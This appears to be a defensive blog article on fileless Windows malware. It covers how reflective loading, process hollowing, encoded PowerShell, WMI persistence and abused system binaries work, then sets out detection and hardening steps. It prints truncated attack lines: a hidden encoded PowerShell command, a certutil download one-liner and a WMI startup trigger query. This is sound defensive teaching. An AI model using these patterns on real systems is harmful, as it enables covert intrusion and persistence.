Fileless malware is among the hardest threats for defenders to catch because no executable lands on disk. The payload runs entirely in memory, hijacks legitimate Windows processes, and uses built-in system tools to execute and persist. Traditional signature-based antivirus is largely blind to it — detection requires behavioral telemetry and memory analysis.
What Makes Malware “Fileless”?
The label is slightly misleading. Most fileless attacks involve some artifacts — registry entries, WMI subscriptions, or Office macros — but the core malicious code never touches the filesystem as a recognizable PE binary. Instead it:
- Executes as shellcode injected into a legitimate process
- Runs through PowerShell or mshta with Base64-encoded payloads
- Persists via WMI event subscriptions stored in the WMI repository
- Uses reflective loading to map DLLs from memory without
LoadLibrary()
The attack surface is Windows’ own administration infrastructure, which is why this technique overlaps with Living Off the Land (LOLBins) attacks.
Core Techniques Explained
Reflective DLL Loading
Standard DLL injection writes a file to disk and calls LoadLibrary(). Reflective loading bypasses this entirely: the DLL is loaded from a memory buffer using a custom loader stub embedded in the payload. The operating system logs no file path for the loaded module.
Cobalt Strike’s beacon.dll, Metasploit’s Meterpreter, and many APT implants use reflective loading as their standard delivery mechanism.
Process Hollowing
A legitimate process such as svchost.exe is launched suspended. The attacker calls NtUnmapViewOfSection() to unmap its memory, writes malicious code into the resulting space, then resumes execution. The process list shows svchost.exe; the code running is the attacker’s.
Modern EDR tools detect this by comparing the on-disk image of a process against its in-memory pages and flagging mismatches.
Encoded PowerShell Payloads
PowerShell’s -EncodedCommand parameter accepts Base64 input and is heavily abused:
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden \
-EncodedCommand JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdA...The encoded payload decodes to a downloader, reverse shell, or credential harvester. Simple string-matching defenses are bypassed because the malicious content is not visible in the command line.
Windows AMSI (Antimalware Scan Interface) was designed to let AV products scan decoded PowerShell before execution. Many attack frameworks include AMSI bypass techniques that patch amsi.dll in the current process memory before running the real payload.
WMI Event Subscriptions for Persistence
WMI can execute commands automatically in response to system events. An attacker creates three linked objects:
- EventFilter — the trigger (e.g., system startup:
SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240) - EventConsumer — the action (typically a
CommandLineEventConsumerrunning PowerShell) - FilterToConsumerBinding — links the two
WMI subscriptions survive reboots, are stored in the WMI repository (%windir%\System32\wbem\Repository), and are invisible in Task Scheduler. Most IT staff never check for them.
LOLBins
Signed Windows binaries repurposed as attack tools:
| Binary | Common Abuse |
|---|---|
mshta.exe | Executes remote HTA files with embedded VBScript |
regsvr32.exe | Loads COM scriptlets from attacker-controlled URLs |
certutil.exe | Downloads files: certutil -urlcache -split -f http://... |
wscript.exe | Runs VBScript or JScript payloads |
rundll32.exe | Calls exported functions from in-memory DLLs |
Because these are Microsoft-signed, they pass application whitelisting checks that rely solely on signature verification.
Detection
Sysmon Event Telemetry
Sysmon (Sysinternals) generates rich logs that standard Windows auditing misses. Key Event IDs for fileless detection:
| Event ID | What It Captures |
|---|---|
| 1 | Process creation with full command line (catches encoded PS) |
| 7 | Image load — flags unsigned DLLs loaded into processes |
| 10 | Process access — detects injection attempts via OpenProcess |
| 20 | WMI EventConsumer creation |
Deploy the SwiftOnSecurity or Olaf Hartong Sysmon configuration as a baseline. Both are freely available on GitHub and cover the most common fileless attack patterns.
PowerShell Script Block Logging
Enable via Group Policy:
Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell
Enable Module Logging and Script Block Logging. Script block logging captures the decoded content of any PowerShell command before execution — defeating Base64 encoding entirely. Logs go to Event ID 4104 in Microsoft-Windows-PowerShell/Operational.
WMI Activity Log
Enable the Microsoft-Windows-WMI-Activity/Operational channel (disabled by default). This records EventConsumer creation and triggered consumer activity — the primary way to spot WMI-based persistence.
EDR vs. Traditional AV
Traditional AV scans files at rest and on write. Fileless payloads never write a file, so there is nothing to scan. Effective detection requires:
- Behavioral monitoring — detecting suspicious process trees (Word spawning PowerShell, PowerShell calling
VirtualAlloc) - In-memory scanning — scanning process memory for shellcode patterns
- Process image integrity — flagging processes whose in-memory code differs from the on-disk PE
Enterprise EDR platforms (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) handle all three. Windows Defender’s Attack Surface Reduction (ASR) rules provide a subset of this at no additional cost.
Hardening Against Fileless Attacks
Enable PowerShell Constrained Language Mode via AppLocker or Windows Defender Application Control (WDAC). This restricts PowerShell to a safe subset that blocks reflection, COM objects, and arbitrary .NET type loading.
Restrict LOLBins for standard users using AppLocker rules. Block mshta.exe, wscript.exe, and certutil.exe from running for non-administrative users.
Enable Attack Surface Reduction rules in Microsoft Defender:
# Block Office child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
# Block obfuscated script execution
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions EnabledAudit WMI subscriptions regularly:
Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumer
Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBindingLegitimate software rarely uses permanent WMI event subscriptions. Any result here warrants investigation.
Fileless attacks are sophisticated but detectable. The foundation is visibility: deploy Sysmon, enable PowerShell logging, and use an EDR with behavioral detection. Without telemetry, defenders are working blind.